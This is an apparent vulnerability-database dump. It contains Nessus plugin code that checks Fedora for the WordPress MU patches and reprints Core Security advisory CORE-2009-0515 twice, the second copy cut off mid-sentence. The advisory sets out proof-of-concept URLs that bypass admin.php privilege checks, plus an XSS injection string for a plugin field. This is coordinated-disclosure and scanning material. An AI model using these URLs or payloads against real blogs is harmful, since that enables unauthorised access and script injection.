get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"wordpress-2.8.1-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wordpress\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:07:36", "description": "Update spans MU-versions for the following security releases from\nupstream:\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n\n - Backport of XSS fixes from WordPress 2.8.2\n - Backport 
of security fixes for admin.php?page= bugs (CVE-2009-2334)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2009-08-18T00:00:00", "title": "Fedora 11 : wordpress-mu-2.8.4a-1.fc11 (2009-8529)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-08-18T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wordpress-mu", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-8529.NASL", "href": "https://www.tenable.com/plugins/nessus/40599", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8529.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40599);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_bugtraq_id(35581, 35584);\n script_xref(name:\"FEDORA\", value:\"2009-8529\");\n\n script_name(english:\"Fedora 11 : wordpress-mu-2.8.4a-1.fc11 (2009-8529)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update spans MU-versions for the following security releases 
from\nupstream:\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-rele\nase/\n\n - Backport of XSS fixes from WordPress 2.8.2 * Backport of\n security fixes for admin.php?page= bugs (CVE-2009-2334)\n Backport of security fixes for admin.php?page= bugs\n (CVE-2009-2334) Backport of security fixes for\n admin.php?page= bugs (CVE-2009-2334)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://wordpress.org/development/2009/08/2-8-4-security-release/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://wordpress.org/news/2009/08/2-8-4-security-release/\"\n );\n # http://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ab4dc04\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=510745\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/027867.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d10c5281\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wordpress-mu package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wordpress-mu\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"wordpress-mu-2.8.4a-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wordpress-mu\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2009-07-09T00:00:00", "published": "2009-07-09T00:00:00", "id": "SECURITYVULNS:VULN:10056", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10056", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nWordPress Privileges Unchecked in admin.php and Multiple Information\r\nDisclosures\r\n\r\n\r\n\r\n1. 
*Advisory Information*\r\n\r\nTitle: WordPress Privileges Unchecked in admin.php and Multiple\r\nInformation Disclosures\r\nAdvisory ID: CORE-2009-0515\r\nAdvisory URL:\r\nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked\r\nDate published: 2009-07-08\r\nDate of last update: 2009-07-08\r\nVendors contacted: WordPress\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Local file include, Privileges unchecked, Cross site scripting\r\n(XSS), Information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 35581, 35584\r\nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nWordPress is a web application written in PHP that allows the easy\r\ninstallation of a flexible weblog on any computer connected to the\r\nInternet. WordPress 2.7 reached more than 6 million downloads during\r\nJune 2009 [9].\r\n\r\nA vulnerability was found in the way that WordPress handles some URL\r\nrequests. This results in unprivileged users viewing the content of\r\nplugins configuration pages, and also in some plugins modifying plugin\r\noptions and injecting JavaScript code. Arbitrary native code may be run\r\nby a malicious attacker if the blog administrator runs injected\r\nJavasScript code that edits blog PHP code. Many WordPress-powered blogs,\r\nhosted outside 'wordpress.com', allow any person to create unprivileged\r\nusers called subscribers. Other sensitive username information\r\ndisclosures were found in WordPress.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . WordPress 2.8 and previous\r\n . WordPress MU 2.7.1 and previous, used in WordPress.com\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . WordPress 2.8.1\r\n . WordPress MU 2.8.1, used in WordPress.com\r\n\r\n\r\n6. 
*Vendor Information, Solutions and Workarounds*\r\n\r\nMitigation for the Privileges Unchecked vulnerability (suggested by Core\r\nSecurity): this vulnerability may be mitigated by controlling access to\r\nfiles inside the 'wp-admin' folder. Access can be prohibited by using\r\nApache access control mechanism ('.htaccess' file), see guideline for\r\nmore information [11].\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Fernando\r\nArnaboldi and José Orlicki from Core Security Technologies. Further\r\nresearch was made by Jose Orlicki from Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Introduction*\r\n\r\nIn the last few years several security bugs were found in WordPress\r\n[1][2]. During 2008, the big amount of bugs reported by researchers lead\r\nto exploitation by blog spammers [3]. During 2009, a new round of\r\nattacks has appeared and security researchers are reporting new bugs or\r\nwrongly fixed previously-reported bugs [4][5]. A path traversal in local\r\nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we\r\nreport that administrative privileges are still unchecked when accessing\r\nany PHP file inside a plugin folder.\r\n\r\n\r\n8.2. *Access Control Roles*\r\n\r\nWordPress has a privilege model where any user has an assigned role [8].\r\nRegarding plugins only users characterized by the role Administrator can\r\nactivate plugins. Notice that only the blog hosting owner can add new\r\nplugins because these must by copied inside the host filesystem. The\r\nroles Editor, Author or Subscriber (the latter has the least privileges)\r\ncannot activate plugins, edit plugins, update plugins nor delete plugins\r\ninstalled by an Administrator. 
Besides that, the configuration of\r\nspecific plugins is a grey area because there is no distinguished\r\ncapability assigned [8].\r\n\r\nAlso due to cross-site scripting vulnerabilities inside plugins options\r\n(something very common), non-administrative users reconfiguring plugins\r\nmay inject persistent JavaScript code. Possibly arbitrary native code\r\ncan be executed by the attacker if the blog administrator runs injected\r\nJavasScript code that injects PHP code. It is important to observe that\r\nmany WordPress-powered blogs are configured to allow any blog visitor to\r\ncreate a Subscriber user without confirmation from the Administrator\r\nrole inside the following URL, although by default the Administrator\r\nrole must create these new users.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-login.php?action=register\r\n- -----------/\r\n\r\n This can be modified by the administrator in 'Membership/Anyone can\r\nregister'.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes\r\n(CVE-2009-2334, BID 35581)*\r\n\r\nNo privileges are checked on WordPress plugins configuration PHP modules\r\nusing parameter 'page' when we replace 'options-general.php' with\r\n'admin.php'. The same thing happens when replacing other modules such as\r\n'plugins.php' with 'admin.php'. Basic information disclosure is done\r\nthis way. 
For example, with the following URL a user with no privileges\r\ncan see the configuration of plugin Collapsing Archives, if installed.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Instead of the following allowed URL.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Another example of this information disclosure is shown on Akismet, a\r\nplugin shipped by default with WordPress.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt\r\n- -----------/\r\n\r\n All plugins we have tested are vulnerable to this kind of information\r\ndisclosure, but in many of them the PHP files accessed just crashed. On\r\nthe other hand, for example, with capability 'import', privileges are\r\nchecked inside 'admin.php':\r\n\r\n/-----------\r\n\r\nif ( ! current_user_can('import') )\r\n wp_die(__('You are not allowed to import.'));\r\n- -----------/\r\n\r\n More dangerous scenarios exist, all of them can be exploited by users\r\nwith the Subscriber role, the least privileged.\r\n\r\n\r\n8.4. *Abuse example: XSS in plugin configuration module*\r\n\r\nIf installed, *Related Ways To Take Action* is an example of a WordPress\r\nplugin that is affected by many cross-site scripting vulnerabilities\r\n(XSS) that can be leveraged by an attacker using the unchecked\r\nprivileges described in this advisory to inject persistent JavaScript\r\ncode. Possibly, arbitrary native code can be executed by the attacker if\r\nthe blog administrator, when he/she logs in, runs injected JavasScript\r\ncode that edits blog PHP code. 
The original URL for reconfiguring the\r\nplugin can be accessed only by the Administrator role.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n But replacing the PHP file with the generic 'admin.php' any blog user\r\ncan modify this configuration.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n The following JavaScript injection can be entered within field *Exclude\r\nactions by term* to exemplify this kind of abuse. When the administrator\r\nenters the same page the injected browser code will be executed and\r\npossibly blog PHP can be modified to run arbitrary native code.\r\n\r\n/-----------\r\n\r\n\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref="\r\n\r\n- -----------/\r\n\r\n This is the worst scenario that we found for the vulnerability.\r\n\r\n\r\n8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard*\r\n\r\nIf installed, the WordPress Security Scanner Plugin dashboard can be\r\nviewed similarly by any user besides the administrator using the plugin\r\nconfiguration page URL without modification. This dashboard includes\r\ncommon default blog configuration settings that are insecure and should\r\nbe modified by the blog administrator or hosting.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.6. 
*Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*\r\n\r\nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be\r\nreconfigured accessed with the same vulnerability.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php\r\n- -----------/\r\n\r\n This gives an attacker the possibility to disable many features of the\r\nplugin, for example reactivate the forgotten password feature and\r\nreactivate the XML-RPC blog interface. Also you can deny the weblog\r\nservice by configuring this plugin to be overly sensitive, blocking any\r\nrequest. However the plugin cannot be totally disabled because the\r\nessential IDS parameters 'Maximum impact to ignore bad requests' and\r\n'Minimum impact to sanitize bad requests' are verified on the server\r\nside of the blog and cannot be distorted to deactivate the sanitizing or\r\nblocking features of the web IDS plugin.\r\n\r\n\r\n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID\r\n35584)*\r\n\r\nWordPress discriminates bad password from bad user logins, this reduces\r\nthe complexity of a brute force attack on WordPress blogs login\r\n(CVE-2009-2335, BID 35584). The same user information disclosure happens\r\nwhen users use the forgotten mail interface to request a new password\r\n(CVE-2009-2336, same BID 35584). These information disclosures seem to\r\nbe previously reported [6] but the WordPress team is refusing to modify\r\nthem alleging *user convenience*.\r\n\r\nDefault installation of WordPress 2.7.1 leaks the name of the user\r\nposting entries inside the HTML of the blog.\r\n\r\n/-----------\r\n\r\n <small>June 3rd, 2009 <!-- by leakedusername --></small>\r\n- -----------/\r\n\r\n\r\n\r\nAlso several administrative modules give to anyone the complete path\r\nwhere the web application is hosted inside the server. This may simplify\r\nor enable other malicious attacks. 
An example follows.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-settings.php\r\n- -----------/\r\n\r\n\r\n\r\n/-----------\r\n\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\wp-settings.php on line 110\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\wp-settings.php on line 112\r\nWarning: require(ABSPATHwp-includes/compat.php) [function.require]:\r\nfailed to open stream:\r\nNo such file or directory in [WP_LEAKED_PATH]\wp-settings.php on line 246\r\nFatal error: require() [function.require]: Failed opening required\r\n'ABSPATHwp-includes/compat.php'\r\n(include_path='.;[PHP_LEAKED_PATH]\php5\pear') in\r\n[WP_LEAKED_PATH]\wp-settings.php on line 246\r\n\r\n- -----------/\r\n\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-06-04:\r\nCore Security Technologies notifies the WordPress team of the\r\nvulnerabilities (security@wordpress.org) and offers a technical\r\ndescription encrypted or in plain-text. Advisory is planned for\r\npublication on June 22th.\r\n\r\n. 2009-06-08:\r\nCore notifies again the WordPress team of the vulnerability.\r\n\r\n. 2009-06-10:\r\nThe WordPress team asks Core for a technical description of the\r\nvulnerability in plain-text.\r\n\r\n. 2009-06-11:\r\nTechnical details sent to WordPress team by Core.\r\n\r\n. 2009-06-11:\r\nWordPress team notifies Core that a fix was produced and is available to\r\nCore for testing. WordPress team asserts that password and username\r\ndiscrimination as well as username leakage are known and will not be\r\nfixed because they are convenient for the users.\r\n\r\n. 2009-06-12:\r\nCore tells the WordPress team that the patch will be tested by Core as a\r\ncourtesy as soon as possible. It also requests confirmation that\r\nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to\r\nthe flaws included in the advisory draft CORE-2009-0515.\r\n\r\n. 
2009-06-12:\r\nWordPress team confirms that WordPress 2.8 and earlier plus\r\nWordPress.com are vulnerable to the flaws included in the advisory draft.\r\n\r\n. 2009-06-17:\r\nCore informs the WordPress team that the patch is only fixing one of the\r\nfour proof of concept abuses included in the advisory draft. Core\r\nreminds the WordPress team that the advisory is scheduled to be\r\npublished on June 22th but a new schedule can be discussed.\r\n\r\n. 2009-06-19:\r\nCore asks for a new patched version of WordPress, if available, and\r\nnotifies the WordPress team that the publication of the advisory was\r\nre-scheduled to June 30th.\r\n\r\n. 2009-06-19:\r\nWordPress team confirms they have a new patch that has the potential to\r\nbreak a lot of plugins.\r\n\r\n. 2009-06-29:\r\nWordPress team asks for a delayance on advisory CORE-2009-0515\r\npublication until July 6th, when WordPress MU version will be patched.\r\n\r\n. 2009-06-29:\r\nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th.\r\n\r\n. 2009-06-29:\r\nCore tells the WordPress team that other administrative PHP modules can\r\nalso be rendered by non-administrative users, such as module\r\n'admin-post.php' and 'link-parse-opml.php'.\r\n\r\n. 2009-07-02:\r\nWordPress team comments that 'admin.php' and 'admin-post.php' are\r\nintentionally open and plugins can choose to hook either privileged or\r\nunprivileged actions. They also comment that unprivileged access to\r\n'link-parse-opml.php' is benign but having this file open is bad form.\r\n\r\n. 2009-07-02:\r\nCore sends the WordPress team a new draft of the advisory and comments\r\nthat there is no capability specified in Worpress documentation for\r\nconfiguring plugins. Also control of actions registered by plugins is\r\nnot enforced. Core also notices that the privileges unchecked bug in\r\n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development\r\nrelease.\r\n\r\n. 
2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress\r\n2.8.1 and WordPress MU 2.8.\r\n\r\n. 2009-07-07:\r\nWordPress team confirms that a release candidate of WordPress 2.8.1 is\r\nmade available to users and that the advisory may be published.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress MU\r\nand WordPress MU new version numbers.\r\n\r\n. 2009-07-07:\r\nWordPress team release WordPress 2.8.1 RC1 to its users.\r\n\r\n. 2009-07-08:\r\nWordPress team confirms that WordPress MU 2.8.1 will be made available\r\nas soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.\r\n\r\n. 2009-07-08:\r\nThe advisory CORE-2009-0515 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] WordPress vulnerabilities in CVE database\r\nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress\r\n[2] SecuriTeam List of WordPress Vulnerabilities\r\nhttp://www.securiteam.com/products/W/Wordpress.html\r\n[3] WordPress Vulnerability - YBO Interactive Blog\r\nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/\r\n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1\r\nhttp://wordpress.org/support/topic/280748\r\n[5] Security breach - xkcd blog\r\nhttp://blag.xkcd.com/2009/06/18/security-breach/\r\n[6] securityvulns.com WordPress vulnerabilities digest in English\r\nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded\r\n[7] CVE-2008-0196\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196\r\n[8] WordPress Roles and Capabilities\r\nhttp://codex.wordpress.org/Roles_and_Capabilities\r\n[9] WordPress Download Counter\r\nhttp://wordpress.org/download/counter/\r\n[10] WordPress Intrusion Detection System Plugin\r\nhttp://php-ids.org/2008/02/21/wpids-version-012-released/\r\n[11] Hardening WordPress with htaccess\r\nhttp://blogsecurity.net/wordpress/article-210607\r\n\r\n\r\n11. 
*About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N\r\nTPRpR0Gn0WqmF8HOeDslbA8=\r\n=zEDK\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-07-09T00:00:00", "published": "2009-07-09T00:00:00", "id": "SECURITYVULNS:DOC:22142", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22142", "title": "CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and Multiple Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:05", "description": "\nWordPress Core MU Plugins - admin.php Privileges Unchecked Multiple Information Disclosures", "edition": 1, "published": "2009-07-10T00:00:00", "title": "WordPress Core MU Plugins - admin.php Privileges Unchecked Multiple Information Disclosures", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-10T00:00:00", "id": "EXPLOITPACK:EA9973B6F5F19BFE8F3E86AA281A9086", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nWordPress Privileges Unchecked in admin.php and Multiple Information\nDisclosures\n\n\n\n1. 
*Advisory Information*\n\nTitle: WordPress Privileges Unchecked in admin.php and Multiple\nInformation Disclosures\nAdvisory ID: CORE-2009-0515\nAdvisory URL:\nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked\nDate published: 2009-07-08\nDate of last update: 2009-07-08\nVendors contacted: WordPress\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Local file include, Privileges unchecked, Cross site scripting\n(XSS), Information disclosure\nRemotely Exploitable: Yes\nLocally Exploitable: No\nBugtraq ID: 35581, 35584\nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336\n\n\n3. *Vulnerability Description*\n\nWordPress is a web application written in PHP that allows the easy\ninstallation of a flexible weblog on any computer connected to the\nInternet. WordPress 2.7 reached more than 6 million downloads during\nJune 2009 [9].\n\nA vulnerability was found in the way that WordPress handles some URL\nrequests. This results in unprivileged users viewing the content of\nplugins configuration pages, and also in some plugins modifying plugin\noptions and injecting JavaScript code. Arbitrary native code may be run\nby a malicious attacker if the blog administrator runs injected\nJavasScript code that edits blog PHP code. Many WordPress-powered blogs,\nhosted outside 'wordpress.com', allow any person to create unprivileged\nusers called subscribers. Other sensitive username information\ndisclosures were found in WordPress.\n\n\n4. *Vulnerable packages*\n\n . WordPress 2.8 and previous\n . WordPress MU 2.7.1 and previous, used in WordPress.com\n\n\n5. *Non-vulnerable packages*\n\n . WordPress 2.8.1\n . WordPress MU 2.8.1, used in WordPress.com\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nMitigation for the Privileges Unchecked vulnerability (suggested by Core\nSecurity): this vulnerability may be mitigated by controlling access to\nfiles inside the 'wp-admin' folder. 
Access can be prohibited by using\nApache access control mechanism ('.htaccess' file), see guideline for\nmore information [11].\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Fernando\nArnaboldi and Jos\u00e9 Orlicki from Core Security Technologies. Further\nresearch was made by Jose Orlicki from Core Security Technologies.\n\n\n8. *Technical Description / Proof of Concept Code*\n\n\n8.1. *Introduction*\n\nIn the last few years several security bugs were found in WordPress\n[1][2]. During 2008, the big amount of bugs reported by researchers lead\nto exploitation by blog spammers [3]. During 2009, a new round of\nattacks has appeared and security researchers are reporting new bugs or\nwrongly fixed previously-reported bugs [4][5]. A path traversal in local\nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we\nreport that administrative privileges are still unchecked when accessing\nany PHP file inside a plugin folder.\n\n\n8.2. *Access Control Roles*\n\nWordPress has a privilege model where any user has an assigned role [8].\nRegarding plugins only users characterized by the role Administrator can\nactivate plugins. Notice that only the blog hosting owner can add new\nplugins because these must by copied inside the host filesystem. The\nroles Editor, Author or Subscriber (the latter has the least privileges)\ncannot activate plugins, edit plugins, update plugins nor delete plugins\ninstalled by an Administrator. Besides that, the configuration of\nspecific plugins is a grey area because there is no distinguished\ncapability assigned [8].\n\nAlso due to cross-site scripting vulnerabilities inside plugins options\n(something very common), non-administrative users reconfiguring plugins\nmay inject persistent JavaScript code. Possibly arbitrary native code\ncan be executed by the attacker if the blog administrator runs injected\nJavasScript code that injects PHP code. 
It is important to observe that\nmany WordPress-powered blogs are configured to allow any blog visitor to\ncreate a Subscriber user without confirmation from the Administrator\nrole inside the following URL, although by default the Administrator\nrole must create these new users.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-login.php?action=register\n- -----------/\n\n This can be modified by the administrator in 'Membership/Anyone can\nregister'.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/options-general.php\n- -----------/\n\n\n\n\n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes\n(CVE-2009-2334, BID 35581)*\n\nNo privileges are checked on WordPress plugins configuration PHP modules\nusing parameter 'page' when we replace 'options-general.php' with\n'admin.php'. The same thing happens when replacing other modules such as\n'plugins.php' with 'admin.php'. Basic information disclosure is done\nthis way. For example, with the following URL a user with no privileges\ncan see the configuration of plugin Collapsing Archives, if 